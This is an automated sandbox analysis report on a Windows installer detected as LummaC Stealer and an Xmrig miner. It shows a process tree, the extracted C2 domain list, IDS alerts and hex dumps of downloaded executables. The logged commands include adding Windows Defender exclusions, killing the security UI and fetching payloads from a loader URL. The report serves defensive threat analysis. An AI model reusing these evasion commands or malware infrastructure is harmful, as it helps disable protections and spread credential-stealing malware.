Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New-inst-x64.exe

Overview

General Information

Sample name:New-inst-x64.exe
Analysis ID:1637051
MD5:d91b1e9db00162b86d2d3c14e1a943ce
SHA1:e487b841d7c5f6eb48d0cdd3d36b340636591abe
SHA256:b1938f21d058442903d3d4c4a2aed153d59300cffd933e213acbb9b5e7d7a4be
Tags:exeuser-tmechen_
Infos:

Detection

LummaC Stealer, Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject code into remote processes
Loading BitLocker PowerShell Module
PE file contains section with special chars
PE file has nameless sections
Queries memory information (via WMI often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New-inst-x64.exe (PID: 7780 cmdline: "C:\Users\user\Desktop\New-inst-x64.exe" MD5: D91B1E9DB00162B86D2D3C14E1A943CE)
    • cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8028 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8116 cmdline: powershell -Command "Get-WmiObject Win32_PortConnector" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7236 cmdline: C:\Windows\system32\cmd.exe /d /s /c "net session" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7396 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7440 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7528 cmdline: taskkill /F /IM SecHealthUI.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
    • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5736 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 5344 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7568 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • vbczvzznbmunxtn.exe (PID: 4348 cmdline: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2324 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 3028 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 4380 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2964 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 3580 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2492 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2172 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2576 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5704 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7616 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5736 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 352 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5348 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 4344 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 4796 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 2224 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 5580 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
      • vbczvzznbmunxtn.exe (PID: 3840 cmdline: "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
  • svchost.exe (PID: 7876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2612 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7472 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 8008 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 8176 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8072 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "9eddd878e03715edd627f50c1f29ec6d309b2d28521a9b9872d266ca"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    dump.pcapMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0xb7d537:$a1: mining.set_target
    • 0xb77501:$a2: XMRIG_HOSTNAME
    • 0xb79af1:$a3: Usage: xmrig [OPTIONS]
    • 0xb774d9:$a4: XMRIG_VERSION

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\New-inst-x64.exe", ParentImage: C:\Users\user\Desktop\New-inst-x64.exe, ParentProcessId: 7780, ParentProcessName: New-inst-x64.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 7564, ProcessName: cmd.exe
      Sigma detected: Powershell Defender Exclusion
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\New-inst-x64.exe", ParentImage: C:\Users\user\Desktop\New-inst-x64.exe, ParentProcessId: 7780, ParentProcessName: New-inst-x64.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 7564, ProcessName: cmd.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", ProcessId: 8116, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7876, ProcessName: svchost.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-13T10:32:19.286273+010028032702Potentially Bad Traffic192.168.2.449727147.45.124.24180TCP
      2025-03-13T10:32:23.322794+010028032702Potentially Bad Traffic192.168.2.449727147.45.124.24180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-13T10:32:19.286273+010028290562Crypto Currency Mining Activity Detected192.168.2.449727147.45.124.24180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-13T10:32:40.812853+010028548021Domain Observed Used for C2 Detected185.236.26.1115968192.168.2.449730TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://138.124.55.36/loader/1/file3.exeAvira URL Cloud: Label: malware
      Source: menuedgarli.shop/AUIqnAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeAvira: detection malicious, Label: TR/Crypt.Agent.ivuts
      Source: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exeAvira: detection malicious, Label: TR/Spy.ClipBanker.bwbhz
      Found malware configuration
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "9eddd878e03715edd627f50c1f29ec6d309b2d28521a9b9872d266ca"}
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exeReversingLabs: Detection: 45%
      Source: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exeReversingLabs: Detection: 25%
      Sample uses string decryption to hide its real strings
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpString decryptor: menuedgarli.shop/AUIqn
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpString decryptor: featureccus.shop/bdMAn
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
      Source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: New-inst-x64.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: New-inst-x64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: New-inst-x64.exe, 00000000.00000000.1171874817.000000000306D000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Sun Aug 6 12:30:37 2023 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"QUICnot available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0046FCDE FindFirstFileExW,28_2_0046FCDE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0046FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0046FD8F
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0046FCDE FindFirstFileExW,29_2_0046FCDE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0046FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0046FD8F

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.236.26.111:5968 -> 192.168.2.4:49730
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: menuedgarli.shop/AUIqn
      Source: Malware configuration extractorURLs: featureccus.shop/bdMAn
      Source: Malware configuration extractorURLs: mrodularmall.top/aNzS
      Source: Malware configuration extractorURLs: jowinjoinery.icu/bdWUa
      Source: Malware configuration extractorURLs: legenassedk.top/bdpWO
      Source: Malware configuration extractorURLs: htardwarehu.icu/Sbdsa
      Source: Malware configuration extractorURLs: cjlaspcorne.icu/DbIps
      Source: Malware configuration extractorURLs: bugildbett.top/bAuz
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 3000
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 3000
      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49721
      Source: global trafficTCP traffic: 192.168.2.4:49720 -> 185.170.153.104:3000
      Source: global trafficTCP traffic: 192.168.2.4:49721 -> 5.252.153.122:3000
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:31:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 11:54:14 GMTETag: "14c200-63023dd3da07b"Accept-Ranges: bytesContent-Length: 1360384Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 b6 9b d0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 9c 08 00 00 fe 00 00 00 00 00 00 82 e6 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 14 00 00 08 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 36 09 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 09 00 40 45 00 00 00 a0 09 00 5c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 fb 08 00 18 00 00 00 98 bf 08 00 c0 00 00 00 00 00 00 00 00 00 00 00 c0 37 09 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 9a 08 00 00 10 00 00 00 9c 08 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 a0 00 00 00 b0 08 00 00 a2 00 00 00 a4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 2c 00 00 00 60 09 00 00 16 00 00 00 46 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 09 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 43 00 00 00 a0 09 00 00 44 00 00 00 5e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 6e 05 00 00 f0 09 00 00 6e 05 00 00 a2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 6e 05 00 00 60 0f 00 00 6e 05 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:31:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 13:30:23 GMTETag: "3daa00-62fac821ad56f"Accept-Ranges: bytesContent-Length: 4041216Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 73 80 a0 e2 12 ee f3 e2 12 ee f3 e2 12 ee f3 a9 6a ed f2 f0 12 ee f3 a9 6a eb f2 7d 12 ee f3 a9 6a ea f2 f4 12 ee f3 f7 6d eb f2 c4 12 ee f3 f7 6d ea f2 f3 12 ee f3 f7 6d ed f2 f7 12 ee f3 a9 6a ef f2 ed 12 ee f3 e2 12 ef f3 6b 12 ee f3 e2 12 ee f3 e3 12 ee f3 c5 d4 83 f3 e3 12 ee f3 d8 92 ea f2 e8 12 ee f3 d8 92 11 f3 e3 12 ee f3 d8 92 ec f2 e3 12 ee f3 52 69 63 68 